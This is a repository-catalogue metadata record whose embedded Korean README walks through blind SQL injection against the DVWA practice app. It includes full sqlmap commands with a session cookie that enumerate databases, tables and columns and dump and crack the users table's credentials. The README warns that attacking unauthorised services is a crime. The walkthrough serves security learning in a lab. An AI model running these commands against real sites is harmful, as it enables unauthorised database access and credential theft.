{"id":26833405,"url":"https://github.com/mr-won/sqlinjection_blind","last_synced_at":"2025-03-30T15:28:55.018Z","repository":{"id":277939524,"uuid":"933980559","full_name":"mr-won/SQLInjection_Blind","owner":"mr-won","description":"SQLInjection_Blind","archived":false,"fork":false,"pushed_at":"2025-03-07T01:44:49.000Z","size":4,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-18T02:27:15.285Z","etag":null,"topics":["igloocorporation","sqlinjection","sqlinjectionattack","sqlinjectionblind"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mr-won.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-17T04:28:39.000Z","updated_at":"2025-03-08T01:57:21.000Z","dependencies_parsed_at":"2025-03-18T02:27:19.800Z","dependency_job_id":"b4fb3eca-362c-4c60-9db0-9ff5724c2abe","html_url":"https://github.com/mr-won/SQLInjection_Blind","commit_stats":null,"previous_names":["chihyeonwon/sqlinjection_blind","mr-won/sqlinjection_blind"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-won%2FSQLInjection_Blind","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-won%2FSQLInjection_Blind/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-won%2FSQLInjection_Blind/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mr-won%2FSQLInjection_Blind/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mr-won","download_url":"https://codeload.github.com/mr-won/SQLInjection_Blind/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246337872,"owners_count":20761283,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["igloocorporation","sqlinjection","sqlinjectionattack","sqlinjectionblind"],"created_at":"2025-03-30T15:28:54.389Z","updated_at":"2025-03-30T15:28:54.994Z","avatar_url":"https://github.com/mr-won.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"## SQL 주입 공격(Blind)\n이 도구를 이용하여 허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위 입니다.       \n해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다.      \nBlind SQL Injection은 Error-Based SQL Injection과 같이 대상 웹 페이지에 취약점을 이용하여 비정상적인 데이터베이스 쿼리를 날려 공격하는 방식입니다.    \n\nBlind SQL Injection의 진단 화면 입니다.        \nUser ID 값을 입력히 URL을 확인해 보시면http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit 이런식으로 id 값이 들어가 있는것을 확인하실수 있으실 겁니다.     \n   \nBlind SQL Injection 진단에서는 SQL MAP 이라는 툴을 사용하도록 하겠습니다.      \n■ Burp Suite(버프스위트) 메뉴 Extender + SQLMAP.exe 설치데이터베이스를 추출하기 전에 공격 대상의 SQL Injection 취약점을 확인하기 위해서 SQL Injection 취약점을 진단하는 명령을 입력합니다.       \nSQL Injection 자동화 공격을 진행할 때에는 [취약점 진단 -\u003e DB -\u003e 테이블 -\u003e 칼럼] 순으로 정보를 추출합니다.     \n\n저는 파이썬코드로 이루어진 sqlmap 을 사용하였습니다. sqlmap.py -h 를 입력하게 되면 sqlmap 의 도움말을 보실수 있습니다.      \n        \nDB 정보를 알아 내기기본 명령어 형식 : sqlmap.py -u URL --dbs-        \nsqlmap.py -u \"http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\" --cookie=\"PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low\" --dbs          \n\n테이블 정보 알아내기기본 명령어 형식 : sqlmap.py -u URL -D (Database) --tables-        \nsqlmap.py -u \"http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\" --cookie=\"PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low\" -D dvwa --tables          \n\n칼럼 정보 추출하기기본 명령어 형식 : sqlmap.py -u URL -T (테이블정보) --column-     \nsqlmap.py -u \"http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\" --cookie=\"PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low\" -D dvwa -T users --column      \n\n데이터베이스 계정 정보 추출하기기본 명령어 형식 : sqlmap.py -u URL -C (칼럼정보) --dump      \n기본 명령어 형식 : sqlmap.py -u URL -D (데이터베이스명) -T (테이블정보) --dump-     \nsqlmap.py -u \"http://자신의 IP/vulnerabilities/sqli_blind/?id=1\u0026Submit=Submit\" --cookie=\"PHPSESSID=b8i23ut9884cvjkavpvlv8ilm0; security=low\" -D dvwa -T users --dump      \n마지막 명령에서 해시 해독을 물어보면 Y를 선택합니다. 계정정보와 패스워드가 무작위로 노출되는 모습을 확인할수 있습니다.     \n\n\n## More Information\nhttp://www.securiteam.com/securityreviews/5DP0N1P76E.html\nhttps://en.wikipedia.org/wiki/SQL_injection\nhttp://ferruh.mavituna.com/sql-injection-cheatsheet-oku/\nhttp://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet\nhttps://owasp.org/www-community/attacks/Blind_SQL_Injection\nhttp://bobby-tables.com/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmr-won%2Fsqlinjection_blind","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmr-won%2Fsqlinjection_blind","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmr-won%2Fsqlinjection_blind/lists"}